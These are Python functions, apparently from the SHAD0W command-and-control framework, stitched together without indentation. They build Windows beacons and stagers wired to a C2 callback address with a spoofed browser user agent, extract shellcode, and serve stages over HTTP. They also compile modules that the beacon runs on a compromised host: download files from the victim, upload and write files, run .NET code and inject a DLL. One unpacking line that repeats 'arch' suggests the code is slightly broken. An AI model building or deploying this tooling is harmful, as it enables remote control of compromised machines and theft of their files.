def generate_beacon_code(shad0w, beacon):
buildtools.clone_source_files(rootdir='injectable')
settings_template = """#define _C2_CALLBACK_ADDRESS L"%s"
#define _C2_CALLBACK_PORT %s
#define _CALLBACK_USER_AGENT L"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36"
#define _CALLBACK_JITTER %s000
#define IMPERSONATE_SESSION "%s"
""" % (shad0w.endpoint, shad0w.addr[1], 1, None)
buildtools.update_settings_file(None, custom_template=settings_template)
if beacon is None:
os = shad0w.beacons[shad0w.current_beacon]["os"]
arch = shad0w.beacons[shad0w.current_beacon]["arch"]
secure = shad0w.beacons[shad0w.current_beacon]["secure"]
else:
arch, arch, secure, _ = buildtools.get_payload_variables(beacon)
buildtools.make_in_clone(arch=arch,
platform=os,
secure=secure,
static=True)
return buildtools.extract_shellcode()
def build(self):
# copy source files into build directory
buildtools.clone_source_files()
# change the settings file based on the args we been given
buildtools.update_settings_file(self)
# now we need to run 'make' inside the cloned dir
buildtools.make_in_clone()
# now get the beacon in the correct format
if self.format == "raw":
# extract the shellcode from the new beacon
rcode = buildtools.extract_shellcode()
# write the shellcode
buildtools.write_and_bridge(self.outfile, rcode)
if self.format == "exe":
# get the bytes of the exe
with open("/root/shad0w/beacon/beacon.exe", 'rb') as file:
rcode = file.read()
# then give them the exe and bridge it
buildtools.write_and_bridge(self.outfile, rcode)
def build(self):
# get the variables for the make
self.arch, self.platform, self.secure, self.static = buildtools.get_payload_variables(
self.payload)
# copy the correct source files into build directory
if self.static is not None:
# then we are building a static beacon
buildtools.clone_source_files(asm=True)
if self.static is None:
# then we are building a stager
buildtools.clone_source_files(asm=True, rootdir="stager")
# change the settings file based on the args we been given
buildtools.update_settings_file(self)
# now we need to run 'make' inside the cloned dir
buildtools.make_in_clone(arch=self.arch,
platform=self.platform,
secure=self.secure,
static=self.static,
debug=self.debugv)
length = payload_format.create(self)
if length != False:
print("\033[1;32m[+]\033[0m",
f"Created {self.outfile} ({length} bytes)")
def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon")
return
# clone all the source files
buildtools.clone_source_files(
rootdir="/root/shad0w/modules/windows/dotnet/",
builddir="/root/shad0w/modules/windows/dotnet/build")
# compile the module
buildtools.make_in_clone(
builddir="/root/shad0w/modules/windows/dotnet/build",
modlocation="/root/shad0w/modules/windows/dotnet/module.exe",
arch="x64")
# get the shellcode from the module
rcode = buildtools.extract_shellcode(
beacon_file="/root/shad0w/modules/windows/dotnet/module.exe",
want_base64=True)
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["callback"] = dotnet_callback
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
def main(shad0w, args):
# save the raw args
raw_args = args
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon")
return
# usage examples
usage_examples = """
Example:
write -f "C:\\Users\\thejoker\\writetome.txt" -d "i am going to be written"
"""
parse = argparse.ArgumentParser(prog='write',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
# keep it behaving nice
parse.exit = exit
parse.error = error
# setup the args
parse.add_argument("-f", "--file", required=True, help="Name of the file you want to write to")
parse.add_argument("-d", "--data", nargs="*", required=True, help="Data you want to write to the file")
# make sure we dont die from weird args
try:
args = parse.parse_args(args[1:])
except:
pass
if not (args.file and args.data):
if ERROR:
print(error_list)
parse.print_help()
return
# clone all the source files
buildtools.clone_source_files(rootdir="/root/shad0w/modules/windows/write/", builddir="/root/shad0w/modules/windows/write/build")
# set the correct settings
filename = ''.join(args.file).replace('"', '').replace('\\', '\\\\')
data = ' '.join(args.data).replace('"', '').replace('\\', '\\\\')
template = "LPCSTR szFileName = \"%s\";\nLPCSTR* wData = \"%s\";" % (filename, data)
buildtools.update_settings_file(None, custom_template=template, custom_path="/root/shad0w/modules/windows/write/build/settings.h")
# compile the module
buildtools.make_in_clone(builddir="/root/shad0w/modules/windows/write/build", modlocation="/root/shad0w/modules/windows/write/module.exe")
# get the shellcode from the module
rcode = buildtools.extract_shellcode(beacon_file="/root/shad0w/modules/windows/write/module.exe", want_base64=True)
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
async def compile_and_store_static(shad0w):
# compile a static secure beacon and store it in memory
shad0w.payloads["x64_secure_static"] = {}
arch = "x64"
platform = "windows"
secure = "secure"
static = "static"
# basically just make a random string
dir_name = generate_beacon_id()
lib_dir_name = "/tmp/" + dir_name + "/lib/"
build_dir_name = "/tmp/" + dir_name + "/build/"
Path(lib_dir_name).mkdir(parents=True, exist_ok=True)
Path(build_dir_name).mkdir(parents=True, exist_ok=True)
mod_name = f"{build_dir_name}../beacon.exe"
os.system(f"cp -r /root/shad0w/beacon/lib/* {lib_dir_name}")
# clone the source files into the temp dir
buildtools.clone_source_files(rootdir="injectable",
builddir=build_dir_name)
# set the settings
settings_template = """#define _C2_CALLBACK_ADDRESS L"%s"
#define _C2_CALLBACK_PORT %s
#define _CALLBACK_USER_AGENT L"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36"
#define _CALLBACK_JITTER %s000
#define IMPERSONATE_SESSION \"%s\"""" % (shad0w.endpoint, shad0w.addr[1], 1,
None)
# write the new settings
buildtools.update_settings_file(None,
custom_template=settings_template,
custom_path=build_dir_name + "/settings.h")
# do the compile
buildtools.make_in_clone(arch=arch,
platform=platform,
secure=secure,
static=static,
builddir=build_dir_name,
modlocation=mod_name)
# read the exe into memory
with open(mod_name, "rb") as file:
shad0w.payloads["x64_secure_static"]["exe"] = file.read()
# read the shellcode into memory
shad0w.payloads["x64_secure_static"]["bin"] = buildtools.extract_shellcode(
beacon_file=mod_name)
# say we finished compiling an quit
shad0w.compile_finished = True
return
def stage_beacon(self, request):
# this will be hit when a stager is requesting a beacon. We will need to parse
# the request for the beacon and generate the correct one, once this is done we
# will to to send it back to the stager.
# a stager should request a beacon via a post request
if request.method == "POST":
# get the payload from the request
payload = request.form['payload']
# get the variables for the make
arch, platform, secure, static = buildtools.get_payload_variables(
payload, warn=False)
# copy the correct source files into build directory
if static is not None:
# then we are building a static beacon
buildtools.clone_source_files(asm=True)
if static is None:
# the we are building a stager
buildtools.clone_source_files(asm=True, rootdir="stager")
# change the settings file based on the args we been given
# these settings should be given by the stager in its request
settings_template = """#define _C2_CALLBACK_ADDRESS L"%s"
#define _C2_CALLBACK_PORT %s
#define _CALLBACK_USER_AGENT L"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36"
#define _CALLBACK_JITTER %s000
""" % (self.shad0w.endpoint, self.shad0w.addr[1], 1)
buildtools.update_settings_file(None,
custom_template=settings_template)
# now we need to run 'make' inside the cloned dir
self.shad0w.debug.spinner(f"Preparing stage...")
buildtools.make_in_clone(arch=arch,
platform=platform,
secure=secure,
static=static)
self.shad0w.debug.stop_spinner = True
# get the shellcode from the payload
rcode = buildtools.extract_shellcode(want_base64=True)
# give the shellcode to the stager
self.shad0w.debug.log(
f"Sending stage {self.shad0w.endpoint} --> {request.remote_addr} ({len(rcode)} bytes)",
log=True)
return rcode
else:
self.shad0w.debug.log("invaild http method for stager")
return self.builder.build(blank=True)
def generate_beacon_dll(shad0w, rcode):
# write header file
write_header(rcode, "/root/shad0w/modules/windows/shinject/beacon.h")
# build the dll
buildtools.clone_source_files(rootdir="/root/shad0w/modules/windows/shinject/", basedir="/root/shad0w/modules/windows/shinject/")
made = buildtools.make_in_clone(modlocation="/root/shad0w/modules/windows/shinject/module.dll", builddir=os.getcwd(), make_target="x64")
# check that the dll has built
if made is not True:
shad0w.debug.error("Error building migrate dll.")
return
# return the base64 dll data
return get_dll_data("/root/shad0w/modules/windows/shinject/module.dll")
def main(shad0w, args):
global FILE_TO_DOWLOAD
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon")
return
# usage examples
usage_examples = """
Examples:
download C:\\Users\\thejoker\\Desktop\\evil_plans.txt
"""
# init the parser
parse = argparse.ArgumentParser(
prog='download',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
# keep it behaving nice
parse.exit = exit
parse.error = error
# setup the args
parse.add_argument("file", nargs='*', help="File you want to download")
# make sure we dont die from weird args
try:
args = parse.parse_args(args[1:])
except:
pass
# we need a file to read so if we dont then fail
if len(args.file) == 0:
print(error_list)
parse.print_help()
return
# save the current dir
shad0w_cwd = os.getcwd()
# change to the dir of the folder mapped to the users current dir
os.chdir("/root/shad0w/.bridge")
# make this variable global so the call back can access it
FILE_TO_DOWLOAD = args.file
# change back to our dir
os.chdir(shad0w_cwd)
# clean up the file name
read_file = ' '.join(args.file).replace('\\', "\\\\").replace('"', '')
# clone all the source files
buildtools.clone_source_files(
rootdir="/root/shad0w/modules/windows/download/",
builddir="/root/shad0w/modules/windows/download/build")
# set the correct settings
template = """#define _C2_CALLBACK_ADDRESS L"%s"
#define _C2_CALLBACK_PORT %s
#define _CALLBACK_USER_AGENT L"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36"
#define _C2CALLBACK_URI L"/tasks"
#define _POST_HEADER L"Content-Type: application/x-www-form-urlencoded\\r\\n"
#define _HEADER_LEN -1
#define SESSION_ID "%s"
#define DO_CALLBACK 0x4000
#define FILENAME "%s" """ % (shad0w.endpoint, shad0w.addr[1],
shad0w.current_beacon, read_file)
buildtools.update_settings_file(
None,
custom_template=template,
custom_path="/root/shad0w/modules/windows/download/build/settings.h")
# compile the module
buildtools.make_in_clone(
builddir="/root/shad0w/modules/windows/download/build",
modlocation="/root/shad0w/modules/windows/download/module.exe",
arch="x64")
# get the shellcode from the module
rcode = buildtools.extract_shellcode(
beacon_file="/root/shad0w/modules/windows/download/module.exe",
want_base64=True)
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["callback"] = download_callback
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
def main(shad0w, args):
global FILE_TO_UPLOAD, FILE_DATA
# used to determine if we are writing to a path or not
abs_path = "TRUE"
# save the raw args
raw_args = args
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon")
return
# usage examples
usage_examples = """
Examples:
upload -f fake_secret_plans.txt -d C:\\Users\\thejoker\\Desktop\\batmans_secret_plans.txt
"""
# init the parser
parse = argparse.ArgumentParser(
prog='upload',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
# keep it behaving nice
parse.exit = exit
parse.error = error
# setup the args
parse.add_argument("-f",
"--file",
required=True,
help="Name of the file you want to upload")
parse.add_argument(
"-d",
"--destination",
nargs="*",
help="Destination where the uploaded file should be stored")
# make sure we dont die from weird args
try:
args = parse.parse_args(args[1:])
except:
pass
# we need a file to read so if we dont then fail
if len(args.file) == 0:
print(error_list)
parse.print_help()
return
# make the destination file name
if args.destination == None:
args.destination = os.path.basename(args.file)
abs_path = "FALSE"
# save the current dir
shad0w_cwd = os.getcwd()
# change to the dir of the folder mapped to the users current dir
os.chdir("/root/shad0w/.bridge")
# read the data from the file
try:
with open(args.file, 'rb') as file:
FILE_DATA = file.read()
except:
shad0w.debug.error(f"File {args.file} does not exist")
# make this variable global so the call back can access it
FILE_TO_UPLOAD = args.file
# change back to our dir
os.chdir(shad0w_cwd)
# clone all the source files
buildtools.clone_source_files(
rootdir="/root/shad0w/modules/windows/upload/",
builddir="/root/shad0w/modules/windows/upload/build")
# set the correct settings
template = """#define _C2_CALLBACK_ADDRESS L"%s"
#define _C2_CALLBACK_PORT %s
#define _CALLBACK_USER_AGENT L"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36"
#define _C2CALLBACK_URI L"/tasks"
#define _POST_HEADER L"Content-Type: application/x-www-form-urlencoded\\r\\n"
#define _HEADER_LEN -1
#define SESSION_ID "%s"
#define DO_CALLBACK 0x4000
#define FILENAME "%s"
#define ABS_PATH %s""" % (shad0w.endpoint, shad0w.addr[1],
shad0w.current_beacon, ''.join(
args.destination), abs_path)
buildtools.update_settings_file(
None,
custom_template=template,
custom_path="/root/shad0w/modules/windows/upload/build/settings.h")
# compile the module
buildtools.make_in_clone(
builddir="/root/shad0w/modules/windows/upload/build",
modlocation="/root/shad0w/modules/windows/upload/module.exe",
arch="x64")
# get the shellcode from the module
rcode = buildtools.extract_shellcode(
beacon_file="/root/shad0w/modules/windows/upload/module.exe",
want_base64=True)
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["callback"] = upload_callback
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
def main(shad0w, args):
# save the raw args
raw_args = args
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon")
return
# usage examples
usage_examples = """
Example:
touch "C:\\Users\\thejoker\\hello.txt"
"""
parse = argparse.ArgumentParser(
prog='touch',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
# keep it behaving nice
parse.exit = exit
parse.error = error
# setup the args
parse.add_argument("name",
nargs='*',
help="Name of the file you want to create")
# make sure we dont die from weird args
try:
args = parse.parse_args(args[1:])
except:
pass
if not args.name:
parse.print_help()
return
# clone all the source files
buildtools.clone_source_files(
rootdir="/root/shad0w/modules/windows/touch/",
builddir="/root/shad0w/modules/windows/touch/build")
# set the correct settings
template = "LPCSTR szFileName = \"%s\";" % (' '.join(args.name).replace(
'"', '').replace('\\', '\\\\'))
buildtools.update_settings_file(
None,
custom_template=template,
custom_path="/root/shad0w/modules/windows/touch/build/settings.h")
# compile the module
buildtools.make_in_clone(
builddir="/root/shad0w/modules/windows/touch/build",
modlocation="/root/shad0w/modules/windows/touch/module.exe")
# get the shellcode from the module
rcode = buildtools.extract_shellcode(
beacon_file="/root/shad0w/modules/windows/touch/module.exe",
want_base64=True)
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
